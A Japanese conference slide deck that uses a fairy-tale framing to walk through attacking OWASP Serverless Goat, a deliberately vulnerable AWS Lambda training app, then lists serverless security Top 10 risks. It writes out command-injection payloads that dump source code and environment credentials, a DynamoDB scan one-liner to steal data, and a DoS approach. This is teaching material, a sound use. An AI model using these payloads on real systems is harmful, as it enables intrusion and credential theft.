SlideShare ist ein Scribd-Unternehmen logo
1 von 31
自己紹介
@Typhon666_death
仕事:大手SIにてインフラ・セキュリティエンジニア/
コンサルタント/アナリスト/営業
主な活動コミュニティ:
OWASP Japan Promotion Teamメンバー
Security-JAWS 運営メンバー
X-Tech JAWS 運営メンバー
レトロゲーム勉強会運営メンバー
お好み焼き検定 初級
過去の発表資料など
https://www.slideshare.net/Typhon666_death
実行委員長やりました。
裏側でどんなことをやったか、どんなマネジメントをしてたか、DevRelJapan/Conferenceやその
他勉強会で喋ったりしました。
動画はこちら
https://devrel.tokyo/japan-2019/speakers/yoshie/
JAWS DAYS 2019 やりました
この物語は本家グリム童話のオマージュであ
り、フィクションです。
実在の狼・子ヤギとは関係ありません。
サーバーレスxセキュリティxAWSの内容で広
島をリスペクトし、初のサーバーレスネタで
プレゼンさせていただきます。
本編
狼と七匹の子山羊[グリム童話]
狼と七匹の子山羊[サーバーレス童話]
狼と七匹の子山羊[サーバーレス童話]
Information Gathering
子山羊がアクセスしたサーバーレスの管理者Webページと仮定
URLフィードのある管理者Webページの一部
アプリケーションがAWS API Gatewayを介して公開されている場合、
URLの形式は
https://{string}.execute-api.{region}.amazonaws.com/{stage}/…
HTTPレスポンスヘッダは、次のヘッダ名が含まれる可能性
x-amz-apigw-id
x-amzn-requestid
x-amzn-trace-id
Information Gathering
詳細なエラーメッセージを残されると、そこには機密情報が含まれている可能性があり、内容に
よってAWS Lambdaを利用したサーバーレスアプリケーションとわかることがある
document_url なしでHTTPリクエストをなげてみる。
例)https://eqfh35ixqj.execute-api.us-east-1.amazonaws.com/Prod/api/convert
このときの下記エラーから
/var/taskにアプリケーションが配置されている
exports.handler : よくあるLambda ファンクションの名前の付け方?
(関数名はhandlerで、index.jsの内部で定義)
document_url → ドキュメントのURLを設定・参照するもの
Reverse Engineering The Lambda Function
関数がOSコマンドインジェクションに対して脆弱かどうかを確認
たとえば、Sleep シェルコマンドでOSコマンドインジェクションが可能か比較
URLフィードにそれぞれを実行して確認してみる
https://www.puresec.io/hubfs/document.doc → ドキュメントの変換されたテキストを返してくれる
https://www.puresec.io/hubfs/document.doc; sleep 1 # → 文字化けしたテキストを返しますが、フ
ァンクションは実行される
https://www.puresec.io/hubfs/document.doc; sleep 5000 # → Internal Server Errorのメッセージを返す
上記から、アプリケーションがdocument_url パラメーターを介したOSコマンドインジェクションに対し
て脆弱であることがわかる
Reverse Engineering The Lambda Function
URLフィードに以下を実行してLambdaの全容を確認してみる
https://foobar; cat /var/task/index.js # → Lambdaファンクションを丸裸
Reverse Engineering The Lambda Function
たとえば、以下のことがわかる。
AWS DynamoDB、node-uuidというNode.jsパッケージを使用していること
アプリケーションは、TABLE_NAME環境変数で名前が定義されているDynamoDBテーブル内
に機密ユーザー情報(IPアドレスとドキュメントURL)を保存すること
OSコマンドインジェクションの背後にある根本的な原因
- child_process.execSync()呼び出しで信頼できないユーザー入力
API呼び出しの出力はS3バケット内に格納され、その名前も環境変数内に格納されること-
BUCKET_NAME
Digging For Gold Inside Environment Variables
機密情報を環境変数内に暗号化されない方法で保存することはよろしくない
URLフィードに以下を実行してenvコマンドを実行し、環境変数からデータを取得
https://foobar; env #
Digging For Gold Inside Environment Variables
3つのIAMトークンをローカル環境に設定し、ファンクションの一時実行ロールを引き受けること
ができる
ローカルでファンクションのロールを実際に使用できることを確認
Exploiting Over-Privileged IAM Roles
Lambda は put()メソッドを使用して、クライアントのIPアドレスとドキュメントURL値を
DynamoDBテーブルに挿入している
DynamoDBに与えるべき最小ロールは dynamodb:PutItem 。しかし、過剰に与えていたら?
OSコマンドインジェクションの弱点を悪用して、dynamodb:Scan パーミッションを悪用して
DynamoDBテーブルからデータを盗み出す
URLフィードに以下を実行
https://; node -e 'const AWS = require("aws-sdk"); (async () => {console.log(await new
AWS.DynamoDB.DocumentClient().scan({TableName:
process.env.TABLE_NAME}).promise());})();'
一部抜粋
Exploiting Over-Privileged IAM Roles
Abusing Insecure Cloud Configurations
サーバーレスアプリケーションにて使用されるS3バケットの名前はすでにわかっている。
http://aws-serverless-repository-serverless-goat-bucket-{string}.s3-website-
{region}.amazonaws.com/{uuid}
BUCKET_NAME=aws-serverless-repository-serverless-goat-bucket-1mgh0m1xs6ppx
以下のようにして、アクセスしてみる。
https://aws-serverless-repository-serverless-goat-bucket-1mgh0m1xs6ppx.s3.amazonaws.com
Abusing Insecure Cloud Configurations
Keyの値をuuidにして、入
力すると、他人のドキュメ
ント内容が判明する。
Finding Known Vulnerabilities In Open Source Packages
Lambdaファンクションのソースコードから、node-uuid というnpmパッケージへの依存関係が含
まれていることがわかった
URLフォームに以下を入力
https://www.puresec.io/hubfs/document.doc; ls #
アプリの開発者は誤って、 package.json の内容を同梱してしまっていることが判明
Finding Known Vulnerabilities In Open Source Packages
URLフォームに以下を入力
https://www.puresec.io/hubfs/document.doc; cat package.json #
バージョンがとても古い
これの脆弱性を悪用することを考えたり。
Denial of Service
Lambdaファンクションの同時実行数に着目して、DoSにすることも可能
例えば、以下のような実行可能なAPI URLをdocument_urlの後、URLエンコードで結合したURL
を用意し、これを同時に実行する。これを同時実行させるスクリプトを組む。
https://i92uw6vw73.execute-api.us-east-
1.amazonaws.com/Prod/api/convert?document_url=https%3A%2F%2Fi92uw6vw73.execute-
api.us-east-1.amazonaws.com%2FProd%2Fapi%2Fconvert%3Fdocument_url...
狼と七匹の子山羊[サーバーレス童話]
Tool Introduction
サーバーレスの脆弱性と戯れることができるツールを紹介
OWASPの一つのプロジェクトとして、Puresec(現在はPaloAltoNetworksが買収)にて開発・
寄贈された。
脆弱性やそれらを悪用する方法、および各問題を修正する方法について学ぶことができる。
サーバーレスの課題とベストプラクティスでの修正方法を説明したドキュメントも有
AWS Serverless Application Repositoryを介してデプロイできるAWS SAMアプリケーシ
ョンとしてパッケージ。
AWS SARでOWASPと検索して、ワンクリックデプロイが可能。
自身でハンズオンすれば、一時間から二時間くらいで考えながら、遊べる。
OWASP Serverless Goat
Puresec社にて、調査・作成されたサーバーレスアーキテクチャにおけるセキュリティの重大事項Top10
SAS-1: Function Event Data Injection
SAS-2: Broken Authentication
SAS-3: Insecure Serverless Deployment Configuration
SAS-4: Over-Privileged Function Permissions & Role
SAS-5: Inadequate Function Monitoring and Loggin
SAS-6: Insecure 3rd Party Dependencies
SAS-7: Insecure Application Secrets Storage
SAS-8: Denial of Service & Financial Resource Exhaustion
SAS-9: Serverless Function Execution Flow Manipulation
SAS-10: Improper Exception Handling and Verbose Error Messages
Serverless architectures Security Top 10 (2018)
このうち、
1,3,4,5,6,8,10について
の体験が
Serverless Goatで可能
Protego社を始めとしたいくつかの企業によるプロジェクトメンバー
で作成されたサーバーレスアプリケーションのセキュリティ脆弱性の
影響について調査されたもの。
OWASP Top 10, OWASP IoT Top10同様に
有志で作成されており、上位ほど重要
OWASP Serverless Top 10 (2017)
SAS Top10 vs OWASP Serverless Top10
Serverless architectures Security Top 10 OWASP Serverless Top 10
SAS-1: Function Event Data Injection
(ファンクションイベントデータインジェクション)
1 A1:2017 Injection
(インジェクション)
SAS-2: Broken Authentication
(認証の不備)
2 A2:2017 Broken Authentication
(認証の不備)
SAS-3: Insecure Serverless Deployment Configuration
(安全でないサーバーレスデプロイ設定)
3 A3:2017 Sensitive Data Exposure
(機微な情報の露出)
SAS-4: Over-Privileged Function Permissions & Role
(過剰な関数の許可やロール設定)
4 A4:2017 XML External Entities (XXE)
(XML外部エンティティ参照)
SAS-5: Inadequate Function Monitoring and Logging
(不十分なモニタリングとロギングの機能)
5 A5:2017 Broken Access Control
(アクセス制御の不備)
SAS-6: Insecure 3rd Party Dependencies
(安全でないサードパーティとの依存関係)
6 A6:2017 Security Misconfiguration
(不適切なセキュリティ設定)
SAS-7: Insecure Application Secrets Storage
(安全でないアプリケーションシークレットストレージ)
7 A7:2017 Cross-Site Scripting (XSS)
(クロスサイトスクリプティング)
SAS-8: Denial of Service & Financial Resource Exhaustion
(DoS & リソース枯渇)
8 A8:2017 Insecure Deserialization
(安全でないデシリアライゼーション)
SAS-9: Serverless Function Execution Flow Manipulation
(サーバーレスファンクションの実行フローの操作)
9 A9:2017 Using Components with Known Vulnerabilities
(既知の脆弱性のあるコンポーネントの使用)
SAS-10: Improper Exception Handling and Verbose Error Messages
(不適切な例外処理と詳細なエラーメッセージ)
10 A10:2017 Insufficient Logging and Monitoring
(不十分なロギングとモニタリング)
Cloud Security Alliance(CSA) Israel Chapterによって作成された
ベースはPuresec開発のもので、見直された。
以下が入れ替わり
旧SAS-9: Serverless Function Execution Flow Manipulation
新SAS-9: Serverless Business Logic Manipulation (サーバーレスビジネスロジックの操作)
また以下二つが追加
SAS-11: Obsolete Functions, Cloud Resources and Event Triggers (廃れたファンクション, クラウドリソ
ース, イベントトリガー)
SAS-12: Cross-Execution Data Persistency (多重実行時のデータの永続性)
The 12 Most Critical Risks for Serverless Applications (2019)
サーバーレスだからといって、過信できる話ではないということを肝に命じてください
Webアプリケーションの作り方に問題があれば、サーバーレスであろうともクレデンシャル
を盗まれる可能性があるということを肝に命じてください
既知の脆弱性に対する対策は通常のWebだろうとサーバーレスだろうと対策することは一緒
サイトがセキュアに構築できてるかどうか、脆弱性診断をベンダーに依頼するのも有り
余談ですが、引用サイトの中に、SASTやDASTやRASPの有用性も書いてますので、一読さ
れたし
ぜひ、セキュアなサーバーレスライフに取り組んでみてください
Conclusion
20191013_Wolf and Seven Little Goats  -Serverless Fairy Tales-

Weitere ähnliche Inhalte

Was ist angesagt?

The Shift Left Path and OWASP
The Shift Left Path and OWASPThe Shift Left Path and OWASP
The Shift Left Path and OWASPRiotaro OKADA
 
IoT Security を実現する3つの視点とShift Left
IoT Security を実現する3つの視点とShift LeftIoT Security を実現する3つの視点とShift Left
IoT Security を実現する3つの視点とShift LeftRiotaro OKADA
 
「教養としてのサイバーセキュリティ」講座
「教養としてのサイバーセキュリティ」講座「教養としてのサイバーセキュリティ」講座
「教養としてのサイバーセキュリティ」講座Riotaro OKADA
 
セキュア開発の<s>3つの</s>敵
セキュア開発の<s>3つの</s>敵セキュア開発の<s>3つの</s>敵
セキュア開発の<s>3つの</s>敵Riotaro OKADA
 
OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)Sen Ueno
 
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そう
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そうSOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そう
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そうRiotaro OKADA
 
アプリケーションデリバリーのバリューチェイン
アプリケーションデリバリーのバリューチェインアプリケーションデリバリーのバリューチェイン
アプリケーションデリバリーのバリューチェインRiotaro OKADA
 
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...Typhon 666
 
アプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはアプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはRiotaro OKADA
 
Owasp Project を使ってみた
Owasp Project を使ってみたOwasp Project を使ってみた
Owasp Project を使ってみたAkitsugu Ito
 
4 Enemies of DevSecOps 2016
4 Enemies of DevSecOps 20164 Enemies of DevSecOps 2016
4 Enemies of DevSecOps 2016Riotaro OKADA
 
シフトレフト ~経営判断をサポートするセキュリティ・ビジョン~
シフトレフト  ~経営判断をサポートするセキュリティ・ビジョン~シフトレフト  ~経営判断をサポートするセキュリティ・ビジョン~
シフトレフト ~経営判断をサポートするセキュリティ・ビジョン~Riotaro OKADA
 
セキュリティスキルをゲットする、たった3つの方法
セキュリティスキルをゲットする、たった3つの方法セキュリティスキルをゲットする、たった3つの方法
セキュリティスキルをゲットする、たった3つの方法Riotaro OKADA
 
Privacy by Design with OWASP
Privacy by Design with OWASPPrivacy by Design with OWASP
Privacy by Design with OWASPRiotaro OKADA
 
オワスプナイト20150115 dependency check
オワスプナイト20150115 dependency checkオワスプナイト20150115 dependency check
オワスプナイト20150115 dependency checkHiroaki Kuramochi
 
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略Riotaro OKADA
 
超高速開発を実現するチームに必要なセキュリティとは
超高速開発を実現するチームに必要なセキュリティとは超高速開発を実現するチームに必要なセキュリティとは
超高速開発を実現するチームに必要なセキュリティとはRiotaro OKADA
 
脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)脆弱性診断研究会
 
なぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのかなぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのかSen Ueno
 

Was ist angesagt? (20)

The Shift Left Path and OWASP
The Shift Left Path and OWASPThe Shift Left Path and OWASP
The Shift Left Path and OWASP
 
IoT Security を実現する3つの視点とShift Left
IoT Security を実現する3つの視点とShift LeftIoT Security を実現する3つの視点とShift Left
IoT Security を実現する3つの視点とShift Left
 
「教養としてのサイバーセキュリティ」講座
「教養としてのサイバーセキュリティ」講座「教養としてのサイバーセキュリティ」講座
「教養としてのサイバーセキュリティ」講座
 
セキュア開発の<s>3つの</s>敵
セキュア開発の<s>3つの</s>敵セキュア開発の<s>3つの</s>敵
セキュア開発の<s>3つの</s>敵
 
OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)
 
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そう
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そうSOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そう
SOSAISEC LT 201701 シフトレフトでセキュリティイニシアチブを取り返そう
 
アプリケーションデリバリーのバリューチェイン
アプリケーションデリバリーのバリューチェインアプリケーションデリバリーのバリューチェイン
アプリケーションデリバリーのバリューチェイン
 
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...
20181108 Participation record SANS SEC545: Cloud Security Architecture and Op...
 
アプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するにはアプリケーションのシフトレフトを実践するには
アプリケーションのシフトレフトを実践するには
 
Owasp Project を使ってみた
Owasp Project を使ってみたOwasp Project を使ってみた
Owasp Project を使ってみた
 
4 Enemies of DevSecOps 2016
4 Enemies of DevSecOps 20164 Enemies of DevSecOps 2016
4 Enemies of DevSecOps 2016
 
シフトレフト ~経営判断をサポートするセキュリティ・ビジョン~
シフトレフト  ~経営判断をサポートするセキュリティ・ビジョン~シフトレフト  ~経営判断をサポートするセキュリティ・ビジョン~
シフトレフト ~経営判断をサポートするセキュリティ・ビジョン~
 
20220113 my seeking_sre_v3
20220113 my seeking_sre_v320220113 my seeking_sre_v3
20220113 my seeking_sre_v3
 
セキュリティスキルをゲットする、たった3つの方法
セキュリティスキルをゲットする、たった3つの方法セキュリティスキルをゲットする、たった3つの方法
セキュリティスキルをゲットする、たった3つの方法
 
Privacy by Design with OWASP
Privacy by Design with OWASPPrivacy by Design with OWASP
Privacy by Design with OWASP
 
オワスプナイト20150115 dependency check
オワスプナイト20150115 dependency checkオワスプナイト20150115 dependency check
オワスプナイト20150115 dependency check
 
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略
「なにをどこまでやれば?」OWASP SAMMが導く開発セキュリティ強化戦略
 
超高速開発を実現するチームに必要なセキュリティとは
超高速開発を実現するチームに必要なセキュリティとは超高速開発を実現するチームに必要なセキュリティとは
超高速開発を実現するチームに必要なセキュリティとは
 
脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)脆弱性診断って何をどうすればいいの?(おかわり)
脆弱性診断って何をどうすればいいの?(おかわり)
 
なぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのかなぜ自社で脆弱性診断を行うべきなのか
なぜ自社で脆弱性診断を行うべきなのか
 

Ähnlich wie 20191013_Wolf and Seven Little Goats -Serverless Fairy Tales-

駅すぱあとWebサービスにおけるAWSとその周辺
駅すぱあとWebサービスにおけるAWSとその周辺駅すぱあとWebサービスにおけるAWSとその周辺
駅すぱあとWebサービスにおけるAWSとその周辺Mikawa Kouta
 
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...Insight Technology, Inc.
 
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-Shinichiro Yoshida
 
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:schoowebcampus
 
正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティymmt
 
AWSの最新動向と事例から知る クラウド利用の進化と真価
AWSの最新動向と事例から知る クラウド利用の進化と真価AWSの最新動向と事例から知る クラウド利用の進化と真価
AWSの最新動向と事例から知る クラウド利用の進化と真価Trainocate Japan, Ltd.
 
クラウドと共に進むエンジニアの進化
クラウドと共に進むエンジニアの進化クラウドと共に進むエンジニアの進化
クラウドと共に進むエンジニアの進化Trainocate Japan, Ltd.
 
[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見Yosuke HASEGAWA
 
Zabbixを使った効果的な運用管理の実現
Zabbixを使った効果的な運用管理の実現Zabbixを使った効果的な運用管理の実現
Zabbixを使った効果的な運用管理の実現Daisuke Ikeda
 
Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Takashi Matsunaga
 
DevOpsが引き金となるインフラエンジニアの進撃
DevOpsが引き金となるインフラエンジニアの進撃DevOpsが引き金となるインフラエンジニアの進撃
DevOpsが引き金となるインフラエンジニアの進撃Teruo Adachi
 
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)Masaya Tahara
 
What is tested by pre-launch (security) reports?
What is tested by pre-launch (security) reports?What is tested by pre-launch (security) reports?
What is tested by pre-launch (security) reports?ak_shio_555
 
AWSによるサーバーレスアーキテクチャ
AWSによるサーバーレスアーキテクチャAWSによるサーバーレスアーキテクチャ
AWSによるサーバーレスアーキテクチャ真吾 吉田
 
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語Takashi Someda
 
高信頼性を確保するソフトウェア開発手法と実践 -組込み製品の潜在的価値を今以上に高めるために-
高信頼性を確保するソフトウェア開発手法と実践-組込み製品の潜在的価値を今以上に高めるために-高信頼性を確保するソフトウェア開発手法と実践-組込み製品の潜在的価値を今以上に高めるために-
高信頼性を確保するソフトウェア開発手法と実践 -組込み製品の潜在的価値を今以上に高めるために-Yoshio SAKAI
 
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)Operation Lab, LLC.
 
OAuth Security Workshop 2017 #osw17
OAuth Security Workshop 2017 #osw17OAuth Security Workshop 2017 #osw17
OAuth Security Workshop 2017 #osw17Tatsuo Kudo
 

Ähnlich wie 20191013_Wolf and Seven Little Goats -Serverless Fairy Tales- (20)

駅すぱあとWebサービスにおけるAWSとその周辺
駅すぱあとWebサービスにおけるAWSとその周辺駅すぱあとWebサービスにおけるAWSとその周辺
駅すぱあとWebサービスにおけるAWSとその周辺
 
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...
[db tech showcase Tokyo 2016] B15: サイバーエージェント アドテクスタジオの次世代データ分析基盤紹介 by 株式会社サイ...
 
[Japan Tech summit 2017] CLD 023
[Japan Tech summit 2017]  CLD 023[Japan Tech summit 2017]  CLD 023
[Japan Tech summit 2017] CLD 023
 
【スカイアーチ】Webサイトを脆弱性攻撃から守る
【スカイアーチ】Webサイトを脆弱性攻撃から守る【スカイアーチ】Webサイトを脆弱性攻撃から守る
【スカイアーチ】Webサイトを脆弱性攻撃から守る
 
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-
Laravel×DevOps -インフラ構築の自動化から運用ログの監視まで-
 
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:
スタートアップのCEOもおさえておきたい、ITインフラのセキュリティ対策 先生:
 
正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ
 
AWSの最新動向と事例から知る クラウド利用の進化と真価
AWSの最新動向と事例から知る クラウド利用の進化と真価AWSの最新動向と事例から知る クラウド利用の進化と真価
AWSの最新動向と事例から知る クラウド利用の進化と真価
 
クラウドと共に進むエンジニアの進化
クラウドと共に進むエンジニアの進化クラウドと共に進むエンジニアの進化
クラウドと共に進むエンジニアの進化
 
[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見[デブサミ2012]趣味と実益の脆弱性発見
[デブサミ2012]趣味と実益の脆弱性発見
 
Zabbixを使った効果的な運用管理の実現
Zabbixを使った効果的な運用管理の実現Zabbixを使った効果的な運用管理の実現
Zabbixを使った効果的な運用管理の実現
 
Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!Zabbixをもっと便利に!安全に!
Zabbixをもっと便利に!安全に!
 
DevOpsが引き金となるインフラエンジニアの進撃
DevOpsが引き金となるインフラエンジニアの進撃DevOpsが引き金となるインフラエンジニアの進撃
DevOpsが引き金となるインフラエンジニアの進撃
 
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)
なぜあなたのプロジェクトのDevSecOpsは形骸化するのか(CloudNative Security Conference 2022)
 
What is tested by pre-launch (security) reports?
What is tested by pre-launch (security) reports?What is tested by pre-launch (security) reports?
What is tested by pre-launch (security) reports?
 
AWSによるサーバーレスアーキテクチャ
AWSによるサーバーレスアーキテクチャAWSによるサーバーレスアーキテクチャ
AWSによるサーバーレスアーキテクチャ
 
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語
Backlog、Cacoo にみるAWS運用の勘所 - JAWS UG 三都物語
 
高信頼性を確保するソフトウェア開発手法と実践 -組込み製品の潜在的価値を今以上に高めるために-
高信頼性を確保するソフトウェア開発手法と実践-組込み製品の潜在的価値を今以上に高めるために-高信頼性を確保するソフトウェア開発手法と実践-組込み製品の潜在的価値を今以上に高めるために-
高信頼性を確保するソフトウェア開発手法と実践 -組込み製品の潜在的価値を今以上に高めるために-
 
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)
2014-10-27 #ssmjp 腹を割って話そう (運用xセキュリティ)
 
OAuth Security Workshop 2017 #osw17
OAuth Security Workshop 2017 #osw17OAuth Security Workshop 2017 #osw17
OAuth Security Workshop 2017 #osw17
 

Mehr von Typhon 666

20240214 Security-JAWS activity results for 2023 and activity goals for 2024
20240214 Security-JAWS activity results for 2023 and activity goals for 202420240214 Security-JAWS activity results for 2023 and activity goals for 2024
20240214 Security-JAWS activity results for 2023 and activity goals for 2024Typhon 666
 
20240207 Comparison of AWS Security Hub and 3rd party CSPM, consideration of...
20240207 Comparison of  AWS Security Hub and 3rd party CSPM, consideration of...20240207 Comparison of  AWS Security Hub and 3rd party CSPM, consideration of...
20240207 Comparison of AWS Security Hub and 3rd party CSPM, consideration of...Typhon 666
 
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~
20230824 Security-JAWSコラボ事例 ~NISCコラボを題材に~Typhon 666
 
20230718 Community support and awards from AWS are full of benefits
20230718 Community support and awards from AWS are full of benefits20230718 Community support and awards from AWS are full of benefits
20230718 Community support and awards from AWS are full of benefitsTyphon 666
 
20230518_The results of the digital business card Prairie Card unveiled at th...
20230518_The results of the digital business card Prairie Card unveiled at th...20230518_The results of the digital business card Prairie Card unveiled at th...
20230518_The results of the digital business card Prairie Card unveiled at th...Typhon 666
 
Continuous Community Management and Output ~What We Cherished, Successes, and...
Continuous Community Management and Output ~What We Cherished, Successes, and...Continuous Community Management and Output ~What We Cherished, Successes, and...
Continuous Community Management and Output ~What We Cherished, Successes, and...Typhon 666
 
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...
継続的コミュニティマネジメントとアウトプット 〜大切にしてきたこと、成功、失敗〜/Continuous Community Management and ...Typhon 666
 
Security-JAWS activity results for 2022 and activity goals for 2023
Security-JAWS activity results for 2022 and activity goals for 2023Security-JAWS activity results for 2022 and activity goals for 2023
Security-JAWS activity results for 2022 and activity goals for 2023Typhon 666
 
20221222 Looking back at my JAWS-UG output in 2022
20221222 Looking back at my JAWS-UG output in 202220221222 Looking back at my JAWS-UG output in 2022
20221222 Looking back at my JAWS-UG output in 2022Typhon 666
 
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LT
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LTIntroduction_of_CNSec_three_dogs _AWS_Dev_Day_LT
Introduction_of_CNSec_three_dogs _AWS_Dev_Day_LTTyphon 666
 
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...
Efforts to Organizing & Broadcastiong JAWS-UG's global event "JAWS PANKRATION...Typhon 666
 
20220121 JAWS PANKRATION 2021 re:Trospective
20220121 JAWS PANKRATION 2021 re:Trospective20220121 JAWS PANKRATION 2021 re:Trospective
20220121 JAWS PANKRATION 2021 re:TrospectiveTyphon 666
 
20211223 Intellectual Constipation, To the World!
20211223 Intellectual Constipation, To the World!20211223 Intellectual Constipation, To the World!
20211223 Intellectual Constipation, To the World!Typhon 666
 
20211121 JAWS PANKRATION 2021 CLOSING REMARKS
20211121 JAWS PANKRATION 2021 CLOSING REMARKS20211121 JAWS PANKRATION 2021 CLOSING REMARKS
20211121 JAWS PANKRATION 2021 CLOSING REMARKSTyphon 666
 
20211120 JAWS PANKRATION 2021 OPENING REMARKS
20211120 JAWS PANKRATION 2021 OPENING REMARKS20211120 JAWS PANKRATION 2021 OPENING REMARKS
